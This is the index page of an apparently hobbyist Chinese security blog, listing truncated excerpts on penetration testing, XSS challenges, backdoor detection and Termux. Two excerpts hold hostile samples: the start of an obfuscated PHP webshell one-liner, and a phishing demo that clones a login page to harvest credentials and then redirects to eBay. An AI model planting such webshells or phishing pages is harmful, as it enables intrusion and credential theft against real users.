没有注明转载均为原创,转载注明出处。关注网络安全,手机渗透,树莓派,便捷式渗透,移动linux,qq1071320680
    据说有黑客潜质的人,三秒钟能记下本博客域名哦!wobushi.cn (wo bu shi )

记一次渗透过程–奇葩获得sqlserver密码

记一次渗透过程–奇葩获得sqlserver密码
这是要连续发两篇渗透文章的节奏啊。。。 题目是这样的:给一个软件 要求:这个软件包含两台以上的服务器,渗透并拿到其中最高权限。不可假借他人之手。可以爆破,可以注入,可以上传,反正你喜欢~   作为一个不懂二进制的Web Dog,需要分析软件,只能把它拖到一个干净的虚拟机,利用各种软件来进行分析…. 寻找软件接口服务器 一开始拿到软……继续阅读 »

Vam 2天前 24浏览 0评论

局域网安全|如何愉快地和妹子聊天

局域网安全|如何愉快地和妹子聊天
博客有话说:好久没跟新博客了,再不更新对不起大家啊。。。文章是不久前写的。。。。 0X00 引言 某日计算机课,被妹子请教学习上的问题。聊着聊着就上课了,但是还没有帮妹子解决问题,妹子一面无奈地回到了自己的位置。作为一个“技术宅”,怎么能容忍解决不了妹子的问题;为了能够保住在妹子心中技术流的形象。不做一个半途而废的人,一定帮妹子解决问题。 但是又作为一个伪……继续阅读 »

Vam 2天前 24浏览 0评论

命令行工具Nircmd使用小案例

命令行工具Nircmd使用小案例
简述 NirCmd是一款命令行使用小工具,通过它可以在命令行下实现很多对系统的操作。比如你可以在命令行下完成:截图,弹出信息框,在某个路径建立快捷方式/打开浏览器,隐藏桌面,操作注册表/文件/网络/连接/显示器/光驱等,拨号连接到的网络账户以及VPN网络,重启、关闭计算机,创建文件快捷方式,改变文件的创建/修改日期,改变显示设置, 关闭显示器,弹出光驱,以及……继续阅读 »

Vam 1个月前 (12-15) 130浏览 2评论

PHP_curl获取Http状态码

PHP_curl获取Http状态码
<?php $ch = curl_init(); //初始化CURL连接 curl_setopt($ch,CURLOPT_URL,”http://wobushi.cn/”); //指定url /* CURL函数库里最重要的函数是curl_setopt(),它可以通过设定CURL函数库定义的选项来定制HTTP请求。上述代码片段中使用了……继续阅读 »

Vam 4个月前 (09-29) 281浏览 0评论

php 一句话

php 一句话
这思路不错~可以自己变异 <?php $a=range(1,200);$b=chr($a[96]).chr($a[114]).chr($a[114]).chr($a[100]).chr($a[113]).chr($a[115]); $b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr(……继续阅读 »

Vam 4个月前 (09-21) 190浏览 0评论

php钓鱼攻击demo

php钓鱼攻击demo
把文件改为login.php,钓鱼网站的提交地址改为login.php所在位置 用主流浏览器把目网页另存,修改提交地址为login.php即可 <?php header ('Location: https://scgi.ebay.com/ws/eBayISAPI.dll?RegisterEnterInfo&siteid……继续阅读 »

Vam 4个月前 (09-10) 253浏览 1评论

抓取软件后门的简单技巧

抓取软件后门的简单技巧
首先打开抓包工具WSExplorer,选择进程 发现有一个除了检测的shell以外的一个连接 ,地址为115.236.113.10 把上图的ip地址拿到同服务器查询,发现是网易乐乎的博客站点 打开wireshark,抓取115.236.113.10的所有数据包 ip.dst_host==115.236.113.10 or ip.src_hos……继续阅读 »

Vam 5个月前 (08-25) 275浏览 0评论

termux:启动php内置web服务器

termux:启动php内置web服务器
    关于termux就不多作介绍了,termux所有的包里面,包含php,但是没有Apache,nginx等等web服务器,如果我们要在Termux里面跑web服务器,可以借助php内置的web服务器。 自PHP5.4之后 PHP内置了一个Web 服务器。 首先,在termux里安装php包 apt update apt isntal……继续阅读 »

Vam 5个月前 (08-19) 309浏览 0评论

XSS的闯关游戏,XSS Challenges

XSS的闯关游戏,XSS Challenges
http://xss-quiz.int21h.jp/     推荐用火狐浏览器! 基本思路:输入"'<><script>等符号,查看源码,看输出点,判断是否存在过滤,再根据实际输出点的标签进行闭合。     如下图第一关,搜索后查看源码,<><script>都是没有……继续阅读 »

Vam 6个月前 (07-31) 297浏览 0评论